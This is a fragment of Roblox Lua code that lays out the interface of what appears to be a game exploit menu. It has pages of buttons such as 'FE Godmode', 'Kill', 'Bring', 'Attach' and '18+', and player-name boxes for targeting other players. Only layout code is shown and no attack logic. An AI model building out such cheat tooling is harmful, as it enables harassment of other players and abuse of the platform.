WeirdOrbit.Position = UDim2.new(0.67696619, 0, 0.744432449, 0) WeirdOrbit.Size = UDim2.new(0, 92, 0, 25) WeirdOrbit.Font = Enum.Font.SourceSans WeirdOrbit.FontSize = Enum.FontSize.Size24 WeirdOrbit.Text = "Weird Orbit" WeirdOrbit.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) WeirdOrbit.TextSize = 22 Violent.Name = "Violent" Violent.Parent = othersBaseBackground2 Violent.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) Violent.BorderSizePixel = 0 Violent.Position = UDim2.new(0.367916405, 0, 0.744432449, 0) Violent.Size = UDim2.new(0, 92, 0, 25) Violent.Font = Enum.Font.SourceSans Violent.FontSize = Enum.FontSize.Size24 Violent.Text = "Violent" Violent.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Violent.TextSize = 22 Max.Name = "Max" Max.Parent = othersBaseBackground2 Max.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) Max.BorderSizePixel = 0 Max.Position = UDim2.new(0.0588666238, 0, 0.744432449, 0) Max.Size = UDim2.new(0, 92, 0, 25) Max.Font = Enum.Font.SourceSans Max.FontSize = Enum.FontSize.Size24 Max.Text = "Max" Max.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Max.TextSize = 22 Others_toPAGE3.Name = "Others_toPAGE3" Others_toPAGE3.Parent = Others_2 Others_toPAGE3.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Others_toPAGE3.BorderSizePixel = 0 Others_toPAGE3.Position = UDim2.new(0.819999993, 0, 0.0439999998, 0) Others_toPAGE3.Size = UDim2.new(0.113205045, 0, 0.109824568, 0) Others_toPAGE3.Font = Enum.Font.SourceSansLight Others_toPAGE3.FontSize = Enum.FontSize.Size24 Others_toPAGE3.Text = "Next" Others_toPAGE3.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Others_toPAGE3.TextSize = 22 Character_toPAGE3_IMAGE.Name = "Character_toPAGE3_IMAGE" Character_toPAGE3_IMAGE.Parent = Others_toPAGE3 Character_toPAGE3_IMAGE.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Character_toPAGE3_IMAGE.BorderSizePixel = 0 Character_toPAGE3_IMAGE.Position = UDim2.new(0.900659323, 0, 0, 0) Character_toPAGE3_IMAGE.Size = UDim2.new(0, 25, 0, 25) Character_toPAGE3_IMAGE.Image = "http://www.roblox.com/asset/?id=1282737326" Others_backPAGE1.Name = "Others_backPAGE1" Others_backPAGE1.Parent = Others_2 Others_backPAGE1.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Others_backPAGE1.BorderSizePixel = 0 Others_backPAGE1.Position = UDim2.new(0.0679230243, 0, 0.0439298227, 0) Others_backPAGE1.Size = UDim2.new(0.113205045, 0, 0.109824568, 0) Others_backPAGE1.Font = Enum.Font.SourceSansLight Others_backPAGE1.FontSize = Enum.FontSize.Size24 Others_backPAGE1.Text = "Prev" Others_backPAGE1.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Others_backPAGE1.TextSize = 22 Character_toPAGE1_IMAGE_2.Name = "Character_toPAGE1_IMAGE" Character_toPAGE1_IMAGE_2.Parent = Others_backPAGE1 Character_toPAGE1_IMAGE_2.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Character_toPAGE1_IMAGE_2.BorderSizePixel = 0 Character_toPAGE1_IMAGE_2.Position = UDim2.new(-0.400293052, 0, 0, 0) Character_toPAGE1_IMAGE_2.Size = UDim2.new(0, 25, 0, 25) Character_toPAGE1_IMAGE_2.Image = "http://www.roblox.com/asset/?id=1282894968" Extra_1.Name = "Extra_1" Extra_1.Parent = Pages Extra_1.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Extra_1.BorderSizePixel = 0 Extra_1.Position = UDim2.new(1, 0, 0, 0) Extra_1.Size = UDim2.new(1, 0, 1, 0) Extra_Image.Name = "Extra_Image" Extra_Image.Parent = Extra_1 Extra_Image.BackgroundColor3 = Color3.new(1, 1, 1) Extra_Image.BackgroundTransparency = 1 Extra_Image.Position = UDim2.new(0.0679230243, 0, 0.0439298227, 0) Extra_Image.Size = UDim2.new(0.0908969939, 0, 0.175596073, 0) Extra_Image.Image = "http://www.roblox.com/asset/?id=1281477720" ExtraText.Name = "ExtraText" ExtraText.Parent = Extra_1 ExtraText.BackgroundColor3 = Color3.new(1, 1, 1) ExtraText.BackgroundTransparency = 1 ExtraText.Position = UDim2.new(0.158487067, 0, 0.109824568, 0) ExtraText.Size = UDim2.new(0.65658927, 0, 0.0878596455, 0) ExtraText.Font = Enum.Font.SourceSansItalic ExtraText.FontSize = Enum.FontSize.Size24 ExtraText.Text = "Cool and unique commands for yourself!" ExtraText.TextSize = 19 ExtraText.TextWrapped = true ExtraBaseBackGround1.Name = "ExtraBaseBackGround1" ExtraBaseBackGround1.Parent = Extra_1 ExtraBaseBackGround1.BackgroundColor3 = Color3.new(0.945098, 0.768628, 0.0588235) ExtraBaseBackGround1.BorderSizePixel = 0 ExtraBaseBackGround1.Position = UDim2.new(0.0790000036, 0, 0.400000006, 0) ExtraBaseBackGround1.Size = UDim2.new(0.25, 0, 0.600000024, 0) CrouchRocket.Name = "CrouchRocket" CrouchRocket.Parent = ExtraBaseBackGround1 CrouchRocket.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) CrouchRocket.BorderSizePixel = 0 CrouchRocket.Position = UDim2.new(0.0901560932, 0, 0.0731094852, 0) CrouchRocket.Size = UDim2.new(0, 92, 0, 25) CrouchRocket.Font = Enum.Font.SourceSans CrouchRocket.FontSize = Enum.FontSize.Size18 CrouchRocket.Text = "Crouch Rocket" CrouchRocket.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) CrouchRocket.TextSize = 17 ExtraBaseBackGround1Side.Name = "ExtraBaseBackGround1Side" ExtraBaseBackGround1Side.Parent = ExtraBaseBackGround1 ExtraBaseBackGround1Side.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) ExtraBaseBackGround1Side.BorderSizePixel = 0 ExtraBaseBackGround1Side.Position = UDim2.new(0, 0, -0.109664232, 0) ExtraBaseBackGround1Side.Size = UDim2.new(1, 0, 0.109999999, 0) CloneIllusion.Name = "CloneIllusion" CloneIllusion.Parent = ExtraBaseBackGround1 CloneIllusion.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) CloneIllusion.BorderSizePixel = 0 CloneIllusion.Position = UDim2.new(0.0901560932, 0, 0.292437941, 0) CloneIllusion.Size = UDim2.new(0, 92, 0, 25) CloneIllusion.Font = Enum.Font.SourceSans CloneIllusion.FontSize = Enum.FontSize.Size18 CloneIllusion.Text = "Clone Illusion" CloneIllusion.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) CloneIllusion.TextSize = 17 CoolSpin.Name = "CoolSpin" CoolSpin.Parent = ExtraBaseBackGround1 CoolSpin.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) CoolSpin.BorderSizePixel = 0 CoolSpin.Position = UDim2.new(0.0901560932, 0, 0.511766434, 0) CoolSpin.Size = UDim2.new(0, 92, 0, 25) CoolSpin.Font = Enum.Font.SourceSans CoolSpin.FontSize = Enum.FontSize.Size18 CoolSpin.Text = "Cool Spin" CoolSpin.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) CoolSpin.TextSize = 17 JumpRocket.Name = "JumpRocket" JumpRocket.Parent = ExtraBaseBackGround1 JumpRocket.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) JumpRocket.BorderSizePixel = 0 JumpRocket.Position = UDim2.new(0.0901560932, 0, 0.731094897, 0) JumpRocket.Size = UDim2.new(0, 92, 0, 25) JumpRocket.Font = Enum.Font.SourceSans JumpRocket.FontSize = Enum.FontSize.Size18 JumpRocket.Text = "Jump Rocket" JumpRocket.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) JumpRocket.TextSize = 17 Extra_toPAGE2.Name = "Extra_toPAGE2" Extra_toPAGE2.Parent = Extra_1 Extra_toPAGE2.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Extra_toPAGE2.BorderSizePixel = 0 Extra_toPAGE2.Position = UDim2.new(0.819999993, 0, 0.0439999998, 0) Extra_toPAGE2.Size = UDim2.new(0.113205045, 0, 0.109824568, 0) Extra_toPAGE2.Font = Enum.Font.SourceSansLight Extra_toPAGE2.FontSize = Enum.FontSize.Size24 Extra_toPAGE2.Text = "Next" Extra_toPAGE2.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Extra_toPAGE2.TextSize = 22 Character_toPAGE2_IMAGE_3.Name = "Character_toPAGE2_IMAGE" Character_toPAGE2_IMAGE_3.Parent = Extra_toPAGE2 Character_toPAGE2_IMAGE_3.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Character_toPAGE2_IMAGE_3.BorderSizePixel = 0 Character_toPAGE2_IMAGE_3.Position = UDim2.new(0.900659323, 0, 0, 0) Character_toPAGE2_IMAGE_3.Size = UDim2.new(0, 25, 0, 25) Character_toPAGE2_IMAGE_3.Image = "http://www.roblox.com/asset/?id=1282737326" Extra_Title.Name = "Extra_Title" Extra_Title.Parent = Extra_1 Extra_Title.BackgroundColor3 = Color3.new(1, 1, 1) Extra_Title.BackgroundTransparency = 1 Extra_Title.Position = UDim2.new(0.226410091, 0, 0, 0) Extra_Title.Size = UDim2.new(0.522657692, 0, 0.1364429, 0) Extra_Title.Font = Enum.Font.SourceSansBold Extra_Title.FontSize = Enum.FontSize.Size28 Extra_Title.Text = "Extra" Extra_Title.TextSize = 25 ExtraBaseBackGround2.Name = "ExtraBaseBackGround2" ExtraBaseBackGround2.Parent = Extra_1 ExtraBaseBackGround2.BackgroundColor3 = Color3.new(0.101961, 0.737255, 0.611765) ExtraBaseBackGround2.BorderSizePixel = 0 ExtraBaseBackGround2.Position = UDim2.new(0.374000013, 0, 0.400000006, 0) ExtraBaseBackGround2.Size = UDim2.new(0.25, 0, 0.600000024, 0) NoLimbs.Name = "NoLimbs" NoLimbs.Parent = ExtraBaseBackGround2 NoLimbs.BackgroundColor3 = Color3.new(0.0862745, 0.627451, 0.521569) NoLimbs.BorderSizePixel = 0 NoLimbs.Position = UDim2.new(0.0901560932, 0, 0.0731094852, 0) NoLimbs.Size = UDim2.new(0, 92, 0, 25) NoLimbs.Font = Enum.Font.SourceSans NoLimbs.FontSize = Enum.FontSize.Size18 NoLimbs.Text = "No Limbs" NoLimbs.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) NoLimbs.TextSize = 17 FEGodmode.Name = "FE Godmode" FEGodmode.Parent = ExtraBaseBackGround2 FEGodmode.BackgroundColor3 = Color3.new(0.0862745, 0.627451, 0.521569) FEGodmode.BorderSizePixel = 0 FEGodmode.Position = UDim2.new(0.0901560932, 0, 0.292437941, 0) FEGodmode.Size = UDim2.new(0, 92, 0, 25) FEGodmode.Font = Enum.Font.SourceSans FEGodmode.FontSize = Enum.FontSize.Size18 FEGodmode.Text = "FE Godmode" FEGodmode.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) FEGodmode.TextSize = 17 BrickHats.Name = "BrickHats" BrickHats.Parent = ExtraBaseBackGround2 BrickHats.BackgroundColor3 = Color3.new(0.0862745, 0.627451, 0.521569) BrickHats.BorderSizePixel = 0 BrickHats.Position = UDim2.new(0.0901560932, 0, 0.511766434, 0) BrickHats.Size = UDim2.new(0, 92, 0, 25) BrickHats.Font = Enum.Font.SourceSans BrickHats.FontSize = Enum.FontSize.Size18 BrickHats.Text = "Brick Hats" BrickHats.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) BrickHats.TextSize = 17 RapidPunch.Name = "RapidPunch" RapidPunch.Parent = ExtraBaseBackGround2 RapidPunch.BackgroundColor3 = Color3.new(0.0862745, 0.627451, 0.521569) RapidPunch.BorderSizePixel = 0 RapidPunch.Position = UDim2.new(0.0901560932, 0, 0.731094897, 0) RapidPunch.Size = UDim2.new(0, 92, 0, 25) RapidPunch.Font = Enum.Font.SourceSans RapidPunch.FontSize = Enum.FontSize.Size18 RapidPunch.Text = "RapidPunch" RapidPunch.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) RapidPunch.TextSize = 17 ExtraBaseBackGround2Side.Name = "ExtraBaseBackGround2Side" ExtraBaseBackGround2Side.Parent = ExtraBaseBackGround2 ExtraBaseBackGround2Side.BackgroundColor3 = Color3.new(0.0862745, 0.627451, 0.521569) ExtraBaseBackGround2Side.BorderSizePixel = 0 ExtraBaseBackGround2Side.Position = UDim2.new(0, 0, -0.109664232, 0) ExtraBaseBackGround2Side.Size = UDim2.new(1, 0, 0.109999999, 0) ExtraBaseBackGround3.Name = "ExtraBaseBackGround3" ExtraBaseBackGround3.Parent = Extra_1 ExtraBaseBackGround3.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) ExtraBaseBackGround3.BorderSizePixel = 0 ExtraBaseBackGround3.Position = UDim2.new(0.667999983, 0, 0.400000006, 0) ExtraBaseBackGround3.Size = UDim2.new(0.25, 0, 0.600000024, 0) PunchFollow.Name = "PunchFollow" PunchFollow.Parent = ExtraBaseBackGround3 PunchFollow.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) PunchFollow.BorderSizePixel = 0 PunchFollow.Position = UDim2.new(0.0901560932, 0, 0.0731094852, 0) PunchFollow.Size = UDim2.new(0, 92, 0, 25) PunchFollow.Font = Enum.Font.SourceSans PunchFollow.FontSize = Enum.FontSize.Size18 PunchFollow.Text = "Punch Follow" PunchFollow.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) PunchFollow.TextSize = 17 ArmFollow.Name = "ArmFollow" ArmFollow.Parent = ExtraBaseBackGround3 ArmFollow.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) ArmFollow.BorderSizePixel = 0 ArmFollow.Position = UDim2.new(0.0901560932, 0, 0.292437941, 0) ArmFollow.Size = UDim2.new(0, 92, 0, 25) ArmFollow.Font = Enum.Font.SourceSans ArmFollow.FontSize = Enum.FontSize.Size18 ArmFollow.Text = "Arm Follow" ArmFollow.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) ArmFollow.TextSize = 17 Spin.Name = "Spin" Spin.Parent = ExtraBaseBackGround3 Spin.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) Spin.BorderSizePixel = 0 Spin.Position = UDim2.new(0.0901560932, 0, 0.511766434, 0) Spin.Size = UDim2.new(0, 92, 0, 25) Spin.Font = Enum.Font.SourceSans Spin.FontSize = Enum.FontSize.Size18 Spin.Text = "Spin" Spin.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Spin.TextSize = 17 Faint.Name = "Faint" Faint.Parent = ExtraBaseBackGround3 Faint.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) Faint.BorderSizePixel = 0 Faint.Position = UDim2.new(0.0901560932, 0, 0.731094897, 0) Faint.Size = UDim2.new(0, 92, 0, 25) Faint.Font = Enum.Font.SourceSans Faint.FontSize = Enum.FontSize.Size18 Faint.Text = "Faint" Faint.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Faint.TextSize = 17 ExtraBaseBackGround3Side.Name = "ExtraBaseBackGround3Side" ExtraBaseBackGround3Side.Parent = ExtraBaseBackGround3 ExtraBaseBackGround3Side.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) ExtraBaseBackGround3Side.BorderSizePixel = 0 ExtraBaseBackGround3Side.Position = UDim2.new(0, 0, -0.109664232, 0) ExtraBaseBackGround3Side.Size = UDim2.new(1, 0, 0.109999999, 0) Extra_2.Name = "Extra_2" Extra_2.Parent = Pages Extra_2.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Extra_2.BorderSizePixel = 0 Extra_2.Position = UDim2.new(1, 0, 0, 0) Extra_2.Size = UDim2.new(1, 0, 1, 0) Extra_Image_2.Name = "Extra_Image" Extra_Image_2.Parent = Extra_2 Extra_Image_2.BackgroundColor3 = Color3.new(1, 1, 1) Extra_Image_2.BackgroundTransparency = 1 Extra_Image_2.Position = UDim2.new(0.80375582, 0, 0.0439298227, 0) Extra_Image_2.Size = UDim2.new(0.0908969939, 0, 0.175596073, 0) Extra_Image_2.Image = "http://www.roblox.com/asset/?id=1282931168" ExtraText_2.Name = "ExtraText" ExtraText_2.Parent = Extra_2 ExtraText_2.BackgroundColor3 = Color3.new(1, 1, 1) ExtraText_2.BackgroundTransparency = 1 ExtraText_2.Position = UDim2.new(0.158487067, 0, 0.109824568, 0) ExtraText_2.Size = UDim2.new(0.65658927, 0, 0.175719291, 0) ExtraText_2.Font = Enum.Font.SourceSansItalic ExtraText_2.FontSize = Enum.FontSize.Size24 ExtraText_2.Text = "Cool and unique commands for other players!" ExtraText_2.TextSize = 19 ExtraText_2.TextWrapped = true Extra_Title_2.Name = "Extra_Title" Extra_Title_2.Parent = Extra_2 Extra_Title_2.BackgroundColor3 = Color3.new(1, 1, 1) Extra_Title_2.BackgroundTransparency = 1 Extra_Title_2.Position = UDim2.new(0.226410091, 0, 0, 0) Extra_Title_2.Size = UDim2.new(0.522657692, 0, 0.1364429, 0) Extra_Title_2.Font = Enum.Font.SourceSansBold Extra_Title_2.FontSize = Enum.FontSize.Size28 Extra_Title_2.Text = "Extra" Extra_Title_2.TextSize = 25 ExtraBaseBackGround2_2.Name = "ExtraBaseBackGround2" ExtraBaseBackGround2_2.Parent = Extra_2 ExtraBaseBackGround2_2.BackgroundColor3 = Color3.new(0.180392, 0.8, 0.443137) ExtraBaseBackGround2_2.BorderSizePixel = 0 ExtraBaseBackGround2_2.Position = UDim2.new(0.158000007, 0, 0.38499999, 0) ExtraBaseBackGround2_2.Size = UDim2.new(0.667909801, 0, 0.615017533, 0) CrouchAttack.Name = "CrouchAttack" CrouchAttack.Parent = ExtraBaseBackGround2_2 CrouchAttack.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) CrouchAttack.BorderSizePixel = 0 CrouchAttack.Position = UDim2.new(0.576693356, 0, 0.321942836, 0) CrouchAttack.Size = UDim2.new(0, 92, 0, 25) CrouchAttack.Font = Enum.Font.SourceSans CrouchAttack.FontSize = Enum.FontSize.Size18 CrouchAttack.Text = "Crouch Attack" CrouchAttack.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) CrouchAttack.TextSize = 17 WalkThrough.Name = "WalkThrough" WalkThrough.Parent = ExtraBaseBackGround2_2 WalkThrough.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) WalkThrough.BorderSizePixel = 0 WalkThrough.Position = UDim2.new(0.118730992, 0, 0.536571443, 0) WalkThrough.Size = UDim2.new(0, 92, 0, 25) WalkThrough.Font = Enum.Font.SourceSans WalkThrough.FontSize = Enum.FontSize.Size18 WalkThrough.Text = "Walk Through" WalkThrough.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) WalkThrough.TextSize = 17 CreepyWatch.Name = "CreepyWatch" CreepyWatch.Parent = ExtraBaseBackGround2_2 CreepyWatch.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) CreepyWatch.BorderSizePixel = 0 CreepyWatch.Position = UDim2.new(0.118730992, 0, 0.321942836, 0) CreepyWatch.Size = UDim2.new(0, 92, 0, 25) CreepyWatch.Font = Enum.Font.SourceSans CreepyWatch.FontSize = Enum.FontSize.Size18 CreepyWatch.Text = "Creepy Watch" CreepyWatch.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) CreepyWatch.TextSize = 17 SpinAttack.Name = "SpinAttack" SpinAttack.Parent = ExtraBaseBackGround2_2 SpinAttack.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) SpinAttack.BorderSizePixel = 0 SpinAttack.Position = UDim2.new(0.576693356, 0, 0.536571443, 0) SpinAttack.Size = UDim2.new(0, 92, 0, 25) SpinAttack.Font = Enum.Font.SourceSans SpinAttack.FontSize = Enum.FontSize.Size18 SpinAttack.Text = "Spin Attack" SpinAttack.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) SpinAttack.TextSize = 17 ExtraBaseBackGround2Side_2.Name = "ExtraBaseBackGround2Side" ExtraBaseBackGround2Side_2.Parent = ExtraBaseBackGround2_2 ExtraBaseBackGround2Side_2.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) ExtraBaseBackGround2Side_2.BorderSizePixel = 0 ExtraBaseBackGround2Side_2.Position = UDim2.new(0, 0, -0.109664232, 0) ExtraBaseBackGround2Side_2.Size = UDim2.new(1, 0, 0.109999999, 0) TXTBOX_PlrNameEXTRA.Name = "TXTBOX_PlrNameEXTRA" TXTBOX_PlrNameEXTRA.Parent = ExtraBaseBackGround2_2 TXTBOX_PlrNameEXTRA.BackgroundColor3 = Color3.new(0.956863, 0.968628, 0.972549) TXTBOX_PlrNameEXTRA.BorderColor3 = Color3.new(0.152941, 0.682353, 0.376471) TXTBOX_PlrNameEXTRA.BorderSizePixel = 0 TXTBOX_PlrNameEXTRA.Position = UDim2.new(0.22050041, 0, 0.0715428591, 0) TXTBOX_PlrNameEXTRA.Size = UDim2.new(0.559731781, 0, 0.143085718, 0) TXTBOX_PlrNameEXTRA.ZIndex = 2 TXTBOX_PlrNameEXTRA.Font = Enum.Font.SourceSans TXTBOX_PlrNameEXTRA.FontSize = Enum.FontSize.Size14 TXTBOX_PlrNameEXTRA.Text = "Player" TXTBOX_PlrNameEXTRA.TextScaled = true TXTBOX_PlrNameEXTRA.TextSize = 14 TXTBOX_PlrNameEXTRA.TextWrapped = true _18.Name = "18+" _18.Parent = ExtraBaseBackGround2_2 _18.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) _18.BorderSizePixel = 0 _18.Position = UDim2.new(0.576693356, 0, 0.75120002, 0) _18.Size = UDim2.new(0, 92, 0, 25) _18.Font = Enum.Font.SourceSans _18.FontSize = Enum.FontSize.Size18 _18.Text = "18+" _18.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) _18.TextSize = 17 SlamPropulsion.Name = "SlamPropulsion" SlamPropulsion.Parent = ExtraBaseBackGround2_2 SlamPropulsion.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) SlamPropulsion.BorderSizePixel = 0 SlamPropulsion.Position = UDim2.new(0.118730992, 0, 0.75120002, 0) SlamPropulsion.Size = UDim2.new(0, 92, 0, 25) SlamPropulsion.Font = Enum.Font.SourceSans SlamPropulsion.FontSize = Enum.FontSize.Size18 SlamPropulsion.Text = "Slam Propulsion" SlamPropulsion.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) SlamPropulsion.TextSize = 15 SlamPropulsion.TextWrapped = true Extra_backPAGE1.Name = "Extra_backPAGE1" Extra_backPAGE1.Parent = Extra_2 Extra_backPAGE1.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Extra_backPAGE1.BorderSizePixel = 0 Extra_backPAGE1.Position = UDim2.new(0.0679230243, 0, 0.0439298227, 0) Extra_backPAGE1.Size = UDim2.new(0.113205045, 0, 0.109824568, 0) Extra_backPAGE1.Font = Enum.Font.SourceSansLight Extra_backPAGE1.FontSize = Enum.FontSize.Size24 Extra_backPAGE1.Text = "Prev" Extra_backPAGE1.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Extra_backPAGE1.TextSize = 22 Character_toPAGE1_IMAGE_3.Name = "Character_toPAGE1_IMAGE" Character_toPAGE1_IMAGE_3.Parent = Extra_backPAGE1 Character_toPAGE1_IMAGE_3.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Character_toPAGE1_IMAGE_3.BorderSizePixel = 0 Character_toPAGE1_IMAGE_3.Position = UDim2.new(-0.400293052, 0, 0, 0) Character_toPAGE1_IMAGE_3.Size = UDim2.new(0, 25, 0, 25) Character_toPAGE1_IMAGE_3.Image = "http://www.roblox.com/asset/?id=1282894968" Others_3.Name = "Others_3" Others_3.Parent = Pages Others_3.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Others_3.BorderSizePixel = 0 Others_3.Position = UDim2.new(1, 0, 0, 0) Others_3.Size = UDim2.new(1, 0, 1, 0) OthersTitle_3.Name = "OthersTitle" OthersTitle_3.Parent = Others_3 OthersTitle_3.BackgroundColor3 = Color3.new(1, 1, 1) OthersTitle_3.BackgroundTransparency = 1 OthersTitle_3.Position = UDim2.new(0.226410091, 0, 0, 0) OthersTitle_3.Size = UDim2.new(0.522657692, 0, 0.1364429, 0) OthersTitle_3.Font = Enum.Font.SourceSansBold OthersTitle_3.FontSize = Enum.FontSize.Size28 OthersTitle_3.Text = "Others" OthersTitle_3.TextSize = 25 Other_Image3.Name = "Other_Image3" Other_Image3.Parent = Others_3 Other_Image3.BackgroundColor3 = Color3.new(1, 1, 1) Other_Image3.BackgroundTransparency = 1 Other_Image3.Position = UDim2.new(0.124525554, 0, 0.219649136, 0) Other_Image3.Size = UDim2.new(0.101884536, 0, 0.197684199, 0) Other_Image3.Image = "http://www.roblox.com/asset/?id=1281286925" OthersText_3.Name = "OthersText" OthersText_3.Parent = Others_3 OthersText_3.BackgroundColor3 = Color3.new(1, 1, 1) OthersText_3.BackgroundTransparency = 1 OthersText_3.Position = UDim2.new(0.237730592, 0, 0.197684199, 0) OthersText_3.Size = UDim2.new(0.65658927, 0, 0.219649136, 0) OthersText_3.Font = Enum.Font.SourceSansItalic OthersText_3.FontSize = Enum.FontSize.Size24 OthersText_3.Text = "Warning! You require tools in your inventory to use these. Some games/tools do not work." OthersText_3.TextSize = 19 OthersText_3.TextWrapped = true TXTBOX_PlrNameOTHER3.Name = "TXTBOX_PlrNameOTHER3" TXTBOX_PlrNameOTHER3.Parent = Others_3 TXTBOX_PlrNameOTHER3.BackgroundColor3 = Color3.new(0.956863, 0.968628, 0.972549) TXTBOX_PlrNameOTHER3.BorderColor3 = Color3.new(0.152941, 0.682353, 0.376471) TXTBOX_PlrNameOTHER3.BorderSizePixel = 0 TXTBOX_PlrNameOTHER3.Position = UDim2.new(0.249051109, 0, 0.571087658, 0) TXTBOX_PlrNameOTHER3.Size = UDim2.new(0.520743191, 0, 0.0878596455, 0) TXTBOX_PlrNameOTHER3.ZIndex = 2 TXTBOX_PlrNameOTHER3.Font = Enum.Font.SourceSans TXTBOX_PlrNameOTHER3.FontSize = Enum.FontSize.Size14 TXTBOX_PlrNameOTHER3.Text = "Player" TXTBOX_PlrNameOTHER3.TextScaled = true TXTBOX_PlrNameOTHER3.TextSize = 14 TXTBOX_PlrNameOTHER3.TextWrapped = true othersBaseBackground3.Name = "othersBaseBackground3" othersBaseBackground3.Parent = Others_3 othersBaseBackground3.BackgroundColor3 = Color3.new(0.752941, 0.223529, 0.168627) othersBaseBackground3.BorderSizePixel = 0 othersBaseBackground3.Position = UDim2.new(0.125, 0, 0.518999994, 0) othersBaseBackground3.Size = UDim2.new(0.769794285, 0, 0.483228087, 0) FreeFall.Name = "FreeFall" FreeFall.Parent = othersBaseBackground3 FreeFall.BackgroundColor3 = Color3.new(0.905882, 0.298039, 0.235294) FreeFall.BorderSizePixel = 0 FreeFall.Position = UDim2.new(0.367916405, 0, 0.364218175, 0) FreeFall.Size = UDim2.new(0, 92, 0, 25) FreeFall.Font = Enum.Font.SourceSans FreeFall.FontSize = Enum.FontSize.Size24 FreeFall.Text = "Free Fall" FreeFall.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) FreeFall.TextSize = 22 Attach.Name = "Attach" Attach.Parent = othersBaseBackground3 Attach.BackgroundColor3 = Color3.new(0.905882, 0.298039, 0.235294) Attach.BorderSizePixel = 0 Attach.Position = UDim2.new(0.67696619, 0, 0.364218175, 0) Attach.Size = UDim2.new(0, 92, 0, 25) Attach.Font = Enum.Font.SourceSans Attach.FontSize = Enum.FontSize.Size24 Attach.Text = "Attach" Attach.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Attach.TextSize = 22 Bring.Name = "Bring" Bring.Parent = othersBaseBackground3 Bring.BackgroundColor3 = Color3.new(0.905882, 0.298039, 0.235294) Bring.BorderSizePixel = 0 Bring.Position = UDim2.new(0.67696619, 0, 0.682909131, 0) Bring.Size = UDim2.new(0, 92, 0, 25) Bring.Font = Enum.Font.SourceSans Bring.FontSize = Enum.FontSize.Size24 Bring.Text = "Bring" Bring.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Bring.TextSize = 22 SafeKill.Name = "SafeKill" SafeKill.Parent = othersBaseBackground3 SafeKill.BackgroundColor3 = Color3.new(0.905882, 0.298039, 0.235294) SafeKill.BorderSizePixel = 0 SafeKill.Position = UDim2.new(0.367916405, 0, 0.682909131, 0) SafeKill.Size = UDim2.new(0, 92, 0, 25) SafeKill.Font = Enum.Font.SourceSans SafeKill.FontSize = Enum.FontSize.Size24 SafeKill.Text = "SafeKill" SafeKill.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) SafeKill.TextSize = 22 SuperSpin.Name = "SuperSpin" SuperSpin.Parent = othersBaseBackground3 SuperSpin.BackgroundColor3 = Color3.new(0.905882, 0.298039, 0.235294) SuperSpin.BorderSizePixel = 0 SuperSpin.Position = UDim2.new(0.0588666238, 0, 0.682909131, 0) SuperSpin.Size = UDim2.new(0, 92, 0, 25) SuperSpin.Font = Enum.Font.SourceSans SuperSpin.FontSize = Enum.FontSize.Size24 SuperSpin.Text = "SuperSpin" SuperSpin.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) SuperSpin.TextSize = 22 Kill.Name = "Kill" Kill.Parent = othersBaseBackground3 Kill.BackgroundColor3 = Color3.new(0.905882, 0.298039, 0.235294) Kill.BorderSizePixel = 0 Kill.Position = UDim2.new(0.0588666238, 0, 0.364218175, 0) Kill.Size = UDim2.new(0, 92, 0, 